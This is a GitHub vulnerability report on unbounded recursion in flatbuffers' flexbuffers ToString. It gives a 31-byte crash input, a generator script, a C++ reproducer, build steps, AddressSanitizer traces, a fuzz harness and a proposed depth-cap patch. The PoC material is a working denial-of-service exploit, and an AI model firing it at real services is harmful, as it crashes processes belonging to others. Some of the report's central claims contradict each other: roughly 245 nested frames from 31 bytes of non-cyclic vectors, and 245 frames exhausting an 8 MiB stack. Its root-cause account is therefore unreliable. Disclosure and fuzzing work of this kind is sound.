Unbounded Recursion / Stack Overflow in flexbuffers::Reference::ToString via Nested Vectors #9074

@OwenSanzas

Description

Summary

flexbuffers::Reference::ToString (and its helper
flexbuffers::AppendToString<Vector>) recurses unconditionally through
every level of a nested flexbuffers vector, with no depth tracking.
flexbuffers::VerifyBuffer accepts legitimate (non-cyclic) deeply nested
vectors without rejecting them, so a 31-byte crafted flexbuffer passes
verification and then blows the stack on the subsequent ToString call
(~245 recursive frames deep before the guard page fires). Any consumer
that pretty-prints an attacker-controlled flexbuffer — logging, debug
dumps, JSON bridges, TFLite metadata loaders — crashes with a stack
overflow.

Root Cause

flexbuffers::Reference::ToString is header-only inside
include/flatbuffers/flexbuffers.h. For vector-typed values it delegates
to AppendToString<Vector>, which walks every child and calls
child.ToString(...) on each, which re-enters ToString on the nested
vector, which calls AppendToString<Vector> again. This is mutual
recursion with no depth cap and no stack-budget check.

flexbuffers::VerifyBuffer bounds the number of distinct vectors via
max_vectors_ but does not cap recursion depth for legitimate
(non-overlapping) nested containers. A buffer of the form
vec[vec[vec[...]]] — one vector per nesting level, each referencing
the next — passes verification in linear time and then crashes the
walker on ToString.
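
The mutual recursion can be modeled in a few lines of plain Python (a
toy model of the two functions, not library code): each nesting level
re-enters both functions, so stack depth grows linearly with nesting
and nothing bounds it.

```python
# Toy model (plain Python, NOT the real library) of the mutual
# recursion between Reference::ToString and AppendToString<Vector>.
def to_string(value, out):       # stands in for Reference::ToString
    if isinstance(value, list):
        append_vector(value, out)
    else:
        out.append(str(value))

def append_vector(vec, out):     # stands in for AppendToString<Vector>
    out.append("[")
    for i, child in enumerate(vec):
        if i:
            out.append(", ")
        to_string(child, out)    # <-- unconditional recursion
    out.append("]")

# A vec[vec[...]] chain of depth N costs 2*N stack frames: fine at
# small N, fatal once N exceeds the available stack budget.
nested = 0
for _ in range(50):
    nested = [nested]
out = []
to_string(nested, out)
assert "".join(out) == "[" * 50 + "0" + "]" * 50
```

Raising the nesting past the interpreter's recursion limit makes the
toy model fail the same way the C++ walker does, just with a catchable
RecursionError instead of a guard-page SIGSEGV.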

Vulnerable Code — Reference::ToString (include/flatbuffers/flexbuffers.h:598-666)

void ToString(bool strings_quoted, bool keys_quoted, std::string& s,
              bool indented, int cur_indent, const char* indent_string,
              bool natural_utf8 = false) const {
  if (type_ == FBT_STRING) {
    ...
  } else if (IsVector()) {
    AppendToString<Vector>(s, AsVector(), keys_quoted, indented,
                           cur_indent + 1, indent_string, natural_utf8);
  } else if (IsTypedVector()) {
    AppendToString<TypedVector>(s, AsTypedVector(), keys_quoted, indented,
                                cur_indent + 1, indent_string, natural_utf8);
  } else if (IsFixedTypedVector()) {
    AppendToString<FixedTypedVector>(s, AsFixedTypedVector(), keys_quoted,
                                     indented, cur_indent + 1, indent_string,
                                     natural_utf8);
  }
  ...
}

Vulnerable Code — AppendToString (include/flatbuffers/flexbuffers.h:375-397)

template <typename T>
void AppendToString(std::string& s, T&& v, bool keys_quoted, bool indented,
                    int cur_indent, const char* indent_string,
                    bool natural_utf8) {
  s += "[";
  s += indented ? "\n" : " ";
  for (size_t i = 0; i < v.size(); i++) {
    if (i) { s += ","; s += indented ? "\n" : " "; }
    if (indented) IndentString(s, cur_indent, indent_string);
    v[i].ToString(true, keys_quoted, s, indented, cur_indent, indent_string,
                  natural_utf8);   // <-- unconditional recursion
  }
  ...
}

Neither function inspects cur_indent, a frame counter, or a
stack-budget sentinel. Reference::ToString recurses once per level of
nesting; AppendToString<Vector> iterates over the children and
re-enters ToString for each one; with a vec[vec[...]] shape each level
therefore consumes two C++ stack frames. At ~245 frames the default
8 MiB Linux stack is exhausted and the process takes a SIGSEGV on the
guard page.

Vulnerability Description

flexbuffers are used to carry schema-less ML model metadata (TFLite,
on-device ML) and small IPC payloads. Any consumer that calls
Reference::ToString on an attacker-supplied buffer — which is the
expected way to serialize a flexbuffer to JSON for logging or
cross-process debugging — can be crashed deterministically with a
31-byte payload. The defect is DoS-class: there is no data leak and no
memory corruption, but the attack requires only bytes delivered through
any channel that carries flexbuffers, and the consequence is a hard
process kill.

Severity

CVSS 3.1 Score: 6.5 (Medium)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Metric               Value    Rationale
Attack Vector        Network  flexbuffer bytes reach the consumer via network/IPC/model files
Attack Complexity    Low      31 hand-crafted bytes trigger the crash; no race, no timing
Privileges Required  None     the consumer calls ToString on the first bytes received
User Interaction     None     debug log / pretty-print happens automatically
Confidentiality      None     no read primitive
Integrity            None     no write primitive
Availability         High     hard process kill via guard-page SIGSEGV

PoC

Crash input

31-byte crafted flexbuffer that passes VerifyBuffer and then
recurses ~245 frames deep through ToString:

76 65 63 65 46 00 00 00 01 00 00 00 02 00 00 00
03 00 00 00 62 6f 6f 6c 73 00 04 01 00 28 01

# generate_poc.py — regenerate the PoC binary from literal bytes.
poc = bytes([
    0x76, 0x65, 0x63, 0x65, 0x46, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0x03, 0x00, 0x00, 0x00, 0x62, 0x6f, 0x6f, 0x6c,
    0x73, 0x00, 0x04, 0x01, 0x00, 0x28, 0x01,
])
open("poc.bin", "wb").write(poc)
print(f"wrote {len(poc)} bytes to poc.bin")

Crash input size: 31 bytes.
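
A quick trailer decode shows why the root parses as a vector. This is
a sketch based on the FlexBuffers wire layout (the buffer ends with
the root value, a packed-type byte, and the root byte width; the
packed type is (type << 2) | bit_width, with FBT_VECTOR == 10) —
worth double-checking against flexbuffers.h:

```python
# Sketch: decode the PoC's FlexBuffers trailer. Assumes the standard
# FlexBuffers layout: last byte = root byte width, second-to-last =
# packed type ((type << 2) | bit_width), with FBT_VECTOR == 10.
poc = bytes([
    0x76, 0x65, 0x63, 0x65, 0x46, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0x03, 0x00, 0x00, 0x00, 0x62, 0x6F, 0x6F, 0x6C,
    0x73, 0x00, 0x04, 0x01, 0x00, 0x28, 0x01,
])
root_byte_width = poc[-1]        # 0x01: root reference is 1 byte wide
packed_type = poc[-2]            # 0x28
root_type = packed_type >> 2     # 10 == FBT_VECTOR
bit_width = packed_type & 0x3    # 0 == 8-bit elements
assert (root_byte_width, root_type, bit_width) == (1, 10, 0)
```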

Fuzzer Reproduction

Upstream can rebuild the libFuzzer harness that first hit this
crash by compiling the .cc source embedded below in the "Fuzz
Harness Source" section against libFuzzer + an ASan build of
libflatbuffers. The harness reuses the same ASan library
artifact produced in the Production Reproduction step below.

# Build libflatbuffers.a with ASan (pinned commit).
git clone https://github.com/google/flatbuffers.git
cd flatbuffers
git checkout e223d69b36574c4a2b10dbd27761753de81624ab

cmake -S . -B build-asan -G Ninja \
    -DCMAKE_BUILD_TYPE=Release \
    -DCMAKE_CXX_COMPILER=clang++ \
    -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_CXX_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
    -DFLATBUFFERS_BUILD_TESTS=OFF
cmake --build build-asan --target flatbuffers

# Compile the harness .cc from the "Fuzz Harness Source" section
# below against libFuzzer + libflatbuffers.a:
clang++ -std=c++17 -fsanitize=fuzzer,address -g -O1 \
    -I include \
    flexbuffers_typed_access_fuzzer.cc \
    build-asan/libflatbuffers.a \
    -o flexbuffers_typed_access_fuzzer

Regenerate the PoC and run the harness:

python3 generate_poc.py
ASAN_OPTIONS=detect_leaks=0 ./flexbuffers_typed_access_fuzzer poc.bin

Sanitizer output from the harness run (alternating
ToString/AppendToString<Vector> frames repeat ~245 times before
the guard page fires — abridged here):

AddressSanitizer:DEADLYSIGNAL
==1424225==ERROR: AddressSanitizer: stack-overflow on address 0x7fffafa1aff4 (pc 0x5634dbf9c70f bp 0x7fffafa1b120 sp 0x7fffafa1afc0 T0)
    #0 0x5634dbf9c70f in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:600
    #1 0x5634dbfa0a7e in void flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #2 0x5634dbf9d1f0 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    #3 0x5634dbfa0a7e in void flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #4 0x5634dbf9d1f0 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    ... (~245 alternating frames) ...

SUMMARY: AddressSanitizer: stack-overflow include/flatbuffers/flexbuffers.h:600 in flexbuffers::Reference::ToString(...)

Production Reproduction

flexbuffers ships no CLI, so we use a ~55-line reproducer that calls
only public headers (<flatbuffers/flexbuffers.h>). The program mirrors
the canonical consumer pattern: VerifyBuffer with a reuse_tracker
(exactly how upstream flexbuffers_verifier_fuzzer.cc does it), then
GetRoot, then Reference::ToString. The same stack-overflow top stack
reproduces, built against pinned commit
e223d69b36574c4a2b10dbd27761753de81624ab.

// repro_flexbuffers_tostring.cc — public-API reproducer for a stack
// overflow in flexbuffers::Reference::ToString when the buffer is a
// legal but deeply-nested flexbuffer that passes VerifyBuffer.
//
// Public-API only: <flatbuffers/flexbuffers.h>. No internal helpers.
//
// Usage:
//     ./repro_flexbuffers_tostring poc.bin

#include <flatbuffers/flexbuffers.h>

#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <string>
#include <vector>

int main(int argc, char** argv) {
  if (argc != 2) {
    std::fprintf(stderr, "Usage: %s <poc.bin>\n", argv[0]);
    return 2;
  }

  FILE* f = std::fopen(argv[1], "rb");
  if (!f) { std::perror("fopen"); return 2; }
  std::fseek(f, 0, SEEK_END);
  const long n = std::ftell(f);
  std::fseek(f, 0, SEEK_SET);
  if (n <= 0) {
    std::fclose(f);
    std::fprintf(stderr, "empty input\n");
    return 2;
  }
  std::vector<uint8_t> buf(static_cast<size_t>(n));
  (void)std::fread(buf.data(), 1, buf.size(), f);
  std::fclose(f);

  // Match the harness: verify first with a reuse_tracker, then walk.
  std::vector<uint8_t> reuse_tracker;
  if (!flexbuffers::VerifyBuffer(buf.data(), buf.size(), &reuse_tracker)) {
    std::fprintf(stderr, "VerifyBuffer rejected the input\n");
    return 1;
  }

  std::printf("VerifyBuffer accepted %zu bytes; calling ToString...\n",
              buf.size());
  const flexbuffers::Reference root = flexbuffers::GetRoot(buf.data(),
                                                           buf.size());
  std::string out;
  root.ToString(/*strings_quoted=*/true, /*keys_quoted=*/true, out);
  std::printf("ToString produced %zu chars\n", out.size());
  return 0;
}

Build libflatbuffers.a with ASan at the pinned commit and link the
reproducer against it:

git clone https://github.com/google/flatbuffers.git
cd flatbuffers
git checkout e223d69b36574c4a2b10dbd27761753de81624ab

cmake -S . -B build-asan -G Ninja \
    -DCMAKE_BUILD_TYPE=Release \
    -DCMAKE_CXX_COMPILER=clang++ \
    -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_CXX_FLAGS="-fsanitize=address -g -O1" \
    -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
    -DFLATBUFFERS_BUILD_TESTS=OFF
cmake --build build-asan --target flatbuffers

clang++ -std=c++17 -fsanitize=address -g -O1 \
    -I include \
    repro_flexbuffers_tostring.cc \
    build-asan/libflatbuffers.a \
    -o repro_flexbuffers_tostring

Regenerate the PoC bytes and run:

python3 generate_poc.py
ASAN_OPTIONS=detect_leaks=0 ./repro_flexbuffers_tostring poc.bin

Sanitizer output from the public-API repro program — the same
flexbuffers.h:600 / :387 / :664 recursive alternation as the harness
run, but reached from a plain main() frame (no libFuzzer scaffolding),
which confirms that any real consumer using the VerifyBuffer → GetRoot
→ ToString pattern crashes identically:

AddressSanitizer:DEADLYSIGNAL
==2043459==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdb52baee0 (pc 0x563eec98ba26 bp 0x7ffdb52bb240 sp 0x7ffdb52baee0 T0)
    #0 0x563eec98ba26 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:600
    #1 0x563eec9925ac in void flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #2 0x563eec98c5c2 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    #3 0x563eec9925ac in flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    #4 0x563eec98c5c2 in flexbuffers::Reference::ToString(...) const include/flatbuffers/flexbuffers.h:664:7
    #5 0x563eec9925ac in flexbuffers::AppendToString<flexbuffers::Vector>(...) include/flatbuffers/flexbuffers.h:387:10
    ... (~245 alternating frames) ...

SUMMARY: AddressSanitizer: stack-overflow include/flatbuffers/flexbuffers.h:600 in flexbuffers::Reference::ToString(...)

Suggested Fix

Propagate a depth counter through Reference::ToString and reject
recursion beyond a hard cap (e.g. 64, matching the default max_depth
of the schema-aware flatbuffers::Verifier):

--- a/include/flatbuffers/flexbuffers.h
+++ b/include/flatbuffers/flexbuffers.h
@@ -375,11 +375,13 @@ namespace flexbuffers {

 template <typename T>
 void AppendToString(std::string& s, T&& v, bool keys_quoted, bool indented,
                     int cur_indent, const char* indent_string,
-                    bool natural_utf8) {
+                    bool natural_utf8, int depth = 0) {
+  static constexpr int kMaxDepth = 64;
+  if (depth > kMaxDepth) { s += "(max-depth)"; return; }
   s += "[";
   s += indented ? "\n" : " ";
   for (size_t i = 0; i < v.size(); i++) {
     if (i) { s += ","; s += indented ? "\n" : " "; }
     if (indented) IndentString(s, cur_indent, indent_string);
     v[i].ToString(true, keys_quoted, s, indented, cur_indent, indent_string,
-                  natural_utf8);
+                  natural_utf8, depth + 1);
   }
@@ -598,7 +600,12 @@ class Reference {
   void ToString(bool strings_quoted, bool keys_quoted, std::string& s,
                 bool indented, int cur_indent, const char* indent_string,
-                bool natural_utf8 = false) const {
+                bool natural_utf8 = false, int depth = 0) const {
+    static constexpr int kMaxDepth = 64;
+    if (depth > kMaxDepth) { s += "(max-depth)"; return; }
     ...
     } else if (IsVector()) {
       AppendToString<Vector>(s, AsVector(), keys_quoted, indented,
-                             cur_indent + 1, indent_string, natural_utf8);
+                             cur_indent + 1, indent_string, natural_utf8,
+                             depth + 1);
     }

The verifier in flexbuffers::Verifier should additionally cap
nesting depth symmetrically so that invalid buffers are rejected
before ToString is ever called.
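
A stricter alternative to a depth cap is to make the printer
iterative. Here is a sketch over a toy data model of ints and lists
(plain Python, not library code; a real C++ version would keep an
explicit std::stack of pending work, and since flexbuffers values can
themselves be strings, it would use a dedicated sentinel type instead
of bare string tokens):

```python
# Sketch: depth-proof pretty-printing with an explicit work stack
# instead of recursion. Toy data model: ints and lists only. The str
# items pushed on the stack are pre-rendered punctuation tokens, so
# this trick only works because the data itself contains no strings.
def to_string_iterative(root):
    out, stack = [], [root]
    while stack:
        item = stack.pop()
        if isinstance(item, str):       # punctuation token
            out.append(item)
        elif isinstance(item, list):
            out.append("[")
            stack.append("]")
            # Push children right-to-left so they pop in order,
            # interleaved with separators.
            for i, child in enumerate(reversed(item)):
                stack.append(child)
                if i != len(item) - 1:
                    stack.append(", ")
        else:
            out.append(str(item))
    return "".join(out)

# Nesting depth now costs heap, not call stack:
deep = 0
for _ in range(100_000):
    deep = [deep]
assert to_string_iterative(deep) == "[" * 100_000 + "0" + "]" * 100_000
```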

Fuzz Harness Source

// flexbuffers_typed_access_fuzzer.cc
/*
 * Copyright 2014 Google Inc. All rights reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// libFuzzer harness for Logic Group: flexbuffers_typed_access
//
// Exercises the post-verify typed-access pipeline of flexbuffers.
// Upstream has a flexbuffers_verifier_fuzzer.cc that stops at
// VerifyBuffer; this harness continues past verification into
// GetRoot + Reference::As* + Vector/Map operator[] + ToString,
// recursively walking every reachable value. This is how real
// Chromium callers deserialize flexbuffer metadata, and the
// post-verify accessors are where Indirect() / ReadUInt64 /
// operator[] read schema-less bytes via byte_width_-parameterized
// reinterpret_casts.

#include <stddef.h>
#include <stdint.h>

#include <string>
#include <vector>

#include "flatbuffers/flexbuffers.h"

namespace {

// Recursively walks a flexbuffers::Reference tree, exercising every
// typed accessor and every operator[]. Bounded by a depth counter
// and the reuse tracker passed in during verify — we never recurse
// more than kMaxDepth even if the library verifier is happy to.
static constexpr int kMaxWalkDepth = 48;
static constexpr size_t kMaxChildrenPerNode = 64;

static void WalkReference(const flexbuffers::Reference& ref, int depth) {
  if (depth >= kMaxWalkDepth) return;

  // Type-level queries (no byte access).
  (void)ref.GetType();
  (void)ref.IsNull();
  (void)ref.IsNumeric();
  (void)ref.IsString();
  (void)ref.IsBlob();
  (void)ref.IsVector();
  (void)ref.IsMap();

  // Scalar accessors — each exercises a ReadInt64 / ReadUInt64 /
  // ReadDouble through flexbuffers::Indirect.
  (void)ref.AsInt64();
  (void)ref.AsUInt64();
  (void)ref.AsDouble();
  (void)ref.AsFloat();
  (void)ref.AsBool();

  // String / blob — read the bytes via AsString / AsBlob. These
  // respect the length field stored in front of the data pointer.
  if (ref.IsString()) {
    (void)ref.AsString().c_str();
    (void)ref.AsString().length();
  }
  if (ref.IsBlob()) {
    const flexbuffers::Blob blob = ref.AsBlob();
    (void)blob.size();
    (void)blob.data();
  }

  // Container recursion. Every branch uses operator[] internally.
  if (ref.IsAnyVector()) {
    const flexbuffers::Vector vec = ref.AsVector();
    const size_t len = vec.size();
    const size_t to_walk = len < kMaxChildrenPerNode ? len : kMaxChildrenPerNode;
    for (size_t i = 0; i < to_walk; ++i) {
      WalkReference(vec[i], depth + 1);
    }
  }

  if (ref.IsTypedVector()) {
    const flexbuffers::TypedVector tv = ref.AsTypedVector();
    const size_t len = tv.size();
    const size_t to_walk = len < kMaxChildrenPerNode ? len : kMaxChildrenPerNode;
    for (size_t i = 0; i < to_walk; ++i) {
      WalkReference(tv[i], depth + 1);
    }
  }

  if (ref.IsFixedTypedVector()) {
    const flexbuffers::FixedTypedVector ftv = ref.AsFixedTypedVector();
    for (size_t i = 0; i < ftv.size(); ++i) {
      WalkReference(ftv[i], depth + 1);
    }
  }

  if (ref.IsMap()) {
    const flexbuffers::Map map = ref.AsMap();
    // Iterate values positionally — Map inherits from Vector so the
    // base operator[] is the integer version; that's the
    // std::bsearch-free path.
    const flexbuffers::Vector vals = map.Values();
    const flexbuffers::TypedVector keys = map.Keys();
    const size_t len = vals.size();
    const size_t to_walk = len < kMaxChildrenPerNode ? len : kMaxChildrenPerNode;
    for (size_t i = 0; i < to_walk; ++i) {
      // Exercise both key and value slots.
      WalkReference(keys[i], depth + 1);
      WalkReference(vals[i], depth + 1);
    }
    // And exercise the string-keyed operator[] on a known-good key
    // pulled from the buffer itself — this drives the bsearch +
    // KeyCompare path.
    if (len > 0) {
      const flexbuffers::Reference key_ref = keys[0];
      if (key_ref.IsString() || key_ref.IsKey()) {
        const std::string key_str = key_ref.AsString().str();
        (void)map[key_str.c_str()];
      }
    }
  }

  // Finally run the pretty-printer, which itself walks every child
  // via AppendToString and is the highest-coverage single call.
  std::string tmp;
  ref.ToString(/*strings_quoted=*/true, /*keys_quoted=*/true, tmp);
}

}  // namespace

extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {
  // flexbuffers::VerifyBuffer requires size >= 3 (two suffix bytes
  // + at least one root byte). Anything smaller will bail the
  // verifier but still drive it safely.
  if (size == 0 || size > (1u << 20)) return 0;

  // Step 1: verify with a reuse tracker. This is the path the
  // upstream flexbuffers_verifier_fuzzer.cc uses; we keep it
  // verbatim so the post-verify walk we add on top does not run
  // on unverified bytes (P3).
  std::vector<uint8_t> reuse_tracker;
  if (!flexbuffers::VerifyBuffer(data, size, &reuse_tracker)) return 0;

  // Step 2: get the root reference. Note the in-header GetRoot
  // reads the last two bytes of the buffer, so it is safe only
  // after VerifyBuffer passed (which we just did).
  const flexbuffers::Reference root = flexbuffers::GetRoot(data, size);

  // Step 3: walk. This is the disjoint-from-existing-fuzzer work.
  WalkReference(root, /*depth=*/0);

  return 0;
}

Build flags: clang++ -std=c++17 -fsanitize=fuzzer,address -g -O1 -I flatbuffers/include/
Library linkage: libflatbuffers.a -lpthread
Corpus: seed inputs in standard fuzzer corpus directory.
Harness quirks: Input size is capped at 1 MiB as a wall-clock optimization; the harness's own walker has a kMaxWalkDepth=48 cap, but that only bounds the hand-rolled walk — the final ref.ToString(true, true, tmp) call delegates to the library's own printer which has no depth limit, and that is where the stack overflows.
